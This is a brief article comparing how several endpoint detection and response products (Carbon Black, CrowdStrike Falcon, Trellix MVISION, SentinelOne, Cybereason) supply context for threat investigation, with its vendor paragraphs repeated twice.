Context is definitely an important factor in responding to potential bad actors and events, helping analysts understand the relevance of a given detection, whether it is relevant, and how it relates to other events that have been captured in the platform. Many of the major players step in to fill this need. Here are some of them, in no particular order.
VMware Carbon Black offers endpoint protection that can be bumped up with their Managed Detection and Response service. They furnish context for root cause to help speed up response.
Crowdstrike's EDR solution, Falcon, provides several options for threat hunting, among which is its Investigate App. You need the in-house expertise to take advantage of it, but it allows you to search for indicators of compromise in your estate by drilling down to explore the context around suspicious activity.
McAfee (now Trellix) MVISION emphasizes its real-time monitoring in which event information is sent to the cloud to help add the context needed to dig up threats. It also allows you to implement a device history search for a specific endpoint.
SentinelOne's threat-hunting solution comes from what it calls its Storylines technology which is updated in real-time. It provides data within its framework of relationships and context for root cause analysis to help you understand the complete string of events that occurred on an endpoint.
Cybereason is another option to consider with what it calls its instant delivery of context-rich attack intelligence. This platform underscores its ability to condense alerts through what is called its MalOp functionality and provides full context around every detection.
A business endpoint is any device (such as mobile phone, desktop, laptop, tablet, server, or any virtual environment) that is physically an endpoint on a business’s enterprise computer network.
Context is definitely an important factor in responding to potential bad actors and events, helping analysts understand the relevance of a given detection, whether it is relevant, and how it relates to other events that have been captured in the platform. Many of the major players step in to fill this need. Here are some of them, in no particular order.
VMware Carbon Black offers endpoint protection that can be bumped up with their Managed Detection and Response service. They furnish context for root cause to help speed up response.
Crowdstrike's EDR solution, Falcon, provides several options for threat hunting, among which is its Investigate App. You need the in-house expertise to take advantage of it, but it allows you to search for indicators of compromise in your estate by drilling down to explore the context around suspicious activity.
McAfee (now Trellix) MVISION emphasizes its real-time monitoring in which event information is sent to the cloud to help add the context needed to dig up threats. It also allows you to implement a device history search for a specific endpoint.
SentinelOne's threat-hunting solution comes from what it calls its Storylines technology which is updated in real-time. It provides data within its framework of relationships and context for root cause analysis to help you understand the complete string of events that occurred on an endpoint.
Cybereason is another option to consider with what it calls its instant delivery of context-rich attack intelligence. This platform underscores its ability to condense alerts through what is called its MalOp functionality and provides full context around every detection.